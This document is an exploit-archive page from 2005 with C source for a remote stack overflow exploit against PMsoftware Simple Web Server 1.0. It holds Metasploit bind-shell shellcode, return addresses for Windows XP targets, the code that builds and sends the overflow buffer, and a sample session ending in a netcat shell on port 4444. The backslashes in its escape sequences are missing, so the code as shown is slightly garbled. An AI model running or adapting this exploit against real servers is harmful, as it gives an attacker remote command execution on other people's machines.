PMsoftware Simple Web Server 1.0 Remote Stack Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PMsoftware Simple Web Server 1.0 Remote Stack Overflow Exploit
# Published : 2005-04-20
# Author : c0d3r
# Previous Title : GoodTech Telnet Server < 5.0.7 Remote BoF Exploit (updated)
# Next Title : MS Exchange Server Remote Code Execution Exploit (MS05-021)
/*   
     PMsoftware mini http server remote stack overflow exploit
     author : c0d3r "kaveh razavi" c0d3rz_team@yahoo.com c0d3r@ihsteam.com 
	 package : PMsoftware Web Server version 1.0
	 advisory : http://www.securiteam.com/windowsntfocus/5TP0B2KFGA.html
	 company address : www.pmx.it
	 timeline :
	 17 Feb 2005 : bug found by ERNW Security
     18 Apr 2005 : Public Disclosure 
     18 Apr 2005 : crash exploit released (ERNW Security)
	 20 Apr 2005 : IHS exploit released , winxpsp1 & winxpsp2 target
	 compiled with visual c++ 6 : cl pm.c 
	 greetz : IHSTeam members,exploit-dev mates, securiteam , str0ke-milw0rm
	 ihsteam.com (persian) www.ihssecurity.com (english , just started)
     a big F*u to those who were/are/will trading konkoor questions-answers
	 (c) IHS security 2005
/*
/*
D:projects>pm.exe 127.0.0.1 80 0

-------- PMSoftware web server remote overflow exploit by c0d3r

[+] building overflow string
[+] attacking host 127.0.0.1
[+] packet size = 680 byte
[+] connected
[+] sending the overflow string
[+] exploit sent successfully try telnet 127.0.0.1 4444

D:projects>nc -vv 127.0.0.1 4444
DNS fwd/rev mismatch: localhost != kaveh
localhost [127.0.0.1] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:Program FilesPMSoftware>DONE !
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define NOP 0x90
#define size 680

// 5 byte GET + 241 byte NOP junk + 4 byte containing return address 
// + 30 byte NOP  + 399 byte shellcode          

// using metasploit great shellcode LPORT=4444 Size=399 

unsigned char shellcode[] =
"xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17x4fx85"
"x2fx98x83xebxfcxe2xf4xb3x6dx79x98x4fx85x7cxcdx19"
"xd2xa4xf4x6bx9dxa4xddx73x0ex7bx9dx37x84xc5x13x05"
"x9dxa4xc2x6fx84xc4x7bx7dxccxa4xacxc4x84xc1xa9xb0"
"x79x1ex58xe3xbdxcfxecx48x44xe0x95x4ex42xc4x6ax74"
"xf9x0bx8cx3ax64xa4xc2x6bx84xc4xfexc4x89x64x13x15"
"x99x2ex73xc4x81xa4x99xa7x6ex2dxa9x8fxdax71xc5x14"
"x47x27x98x11xefx1fxc1x2bx0ex36x13x14x89xa4xc3x53"
"x0ex34x13x14x8dx7cxf0xc1xcbx21x74xb0x53xa6x5fxce"
"x69x2fx99x4fx85x78xcex1cx0cxcax70x68x85x2fx98xdf"
"x84x2fx98xf9x9cx37x7fxebx9cx5fx71xaaxccxa9xd1xeb"
"x9fx5fx5fxebx28x01x71x96x8cxdax35x84x68xd3xa3x18"
"xd6x1dxc7x7cxb7x2fxc3xc2xcex0fxc9xb0x52xa6x47xc6"
"x46xa2xedx5bxefx28xc1x1exd6xd0xacxc0x7ax7ax9cx16"
"x0cx2bx16xadx77x04xbfx1bx7ax18x67x1axb5x1ex58x1f"
"xd5x7fxc8x0fxd5x6fxc8xb0xd0x03x11x88xb4xf4xcbx1c"
"xedx2dx98x5exd9xa6x78x25x95x7fxcfxb0xd0x0bxcbx18"
"x7ax7axb0x1cxd1x78x67x1axa5xa6x5fx27xc6x62xdcx4f"
"x0cxccx1fxb5xb4xefx15x33xa1x83xf2x5axdcxdcx33xc8"
"x7fxacx74x1bx43x6bxbcx5fxc1x49x5fx0bxa1x13x99x4e"
"x0cx53xbcx07x0cx53xbcx03x0cx53xbcx1fx08x6bxbcx5f"
"xd1x7fxc9x1exd4x6exc9x06xd4x7excbx1ex7ax5ax98x27"
"xf7xd1x2bx59x7ax7ax9cxb0x55xa6x7exb0xf0x2fxf0xe2"
"x5cx2ax56xb0xd0x2bx11x8cxefxd0x67x79x7axfcx67x3a"
"x85x47x68xc5x81x70x67x1ax81x1ex43x1cx7axffx98";
  
  
  unsigned int rc,sock,os,addr ;
  struct sockaddr_in tcp;
  struct hostent *hp;
  WSADATA wsaData;
  char buffer[size];
  char jmp_esp[5];
  unsigned short port;
  char GET[] = "x47x45x54x20x2F";
  char winxpsp1[] = "xCCx59xFBx77";
  char winxpsp2[] = "xEDx1Ex94x7C"; // not tested
  
 int main (int argc, char *argv[]){
  
	
	 if(argc < 3) {
 printf("n-------- PMSoftware web server remote overflow exploit by c0d3rn");
 printf("-------- usage : pm.exe host port targetn");
 printf("-------- target 1 : windows xp service pack 1 : 0n");
 printf("-------- target 2 : windows xp service pack 1 : 1n");
 printf("-------- eg : pm.exe 127.0.0.1 80 0nn");	
 exit(-1) ;
  } 
  printf("n-------- PMSoftware web server remote overflow exploit by c0d3rnn");
 os = (unsigned short)atoi(argv[3]); 	 
  switch(os)
  {
   case 0:
    strcat(jmp_esp,winxpsp1);
    break;
   case 1:
    strcat(jmp_esp,winxpsp2); // wasnt checked
    break;
   default:
    printf("n[-] this target doesnt exist in the listnn");
   
    exit(-1);
  }  
	
    // Creating heart of exploit code
  printf("[+] building overflow string");
  
    memset(buffer,NOP,size);
    memcpy(buffer,GET,sizeof(GET)-1);
	memcpy(buffer+246,jmp_esp,sizeof(jmp_esp)-1);
    memcpy(buffer+275,shellcode,sizeof(shellcode)-1);
    buffer[size] = 0;
	
	// EO heart of exploit code 

  
			if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
   printf("[-] WSAStartup failed !n");
   exit(-1);
  }
	hp = gethostbyname(argv[1]);
  if (!hp){
   addr = inet_addr(argv[1]);
  }
  if ((!hp)  && (addr == INADDR_NONE) ){
   printf("[-] unable to resolve %sn",argv[1]);
   exit(-1);
  }
  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  if (!sock){ 
   printf("[-] socket() error...n");
   exit(-1);
  }
	  if (hp != NULL)
   memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
  else
   tcp.sin_addr.s_addr = addr;

  if (hp)
   tcp.sin_family = hp->h_addrtype;
  else
  tcp.sin_family = AF_INET;
  port=atoi(argv[2]);
  tcp.sin_port=htons(port);
   
  
  printf("n[+] attacking host %sn" , argv[1]) ;
  
  Sleep(1000);
  
  printf("[+] packet size = %d byten" , sizeof(buffer));
  
  rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
  if(rc==0)
  {
    
     Sleep(1000) ;
	 printf("[+] connectedn") ;
     printf("[+] sending the overflow stringn") ;
	 send(sock,buffer,strlen(buffer),0);
	 printf("[+] exploit sent successfully try telnet %s 4444n" , argv[1]);
  } 
  
  else {
      printf("[-] ouch! Server is not listening .... n");
 }
  shutdown(sock,1);
  closesocket(sock);
  }
  // EO exploit code

// www.Syue.com [2005-04-20]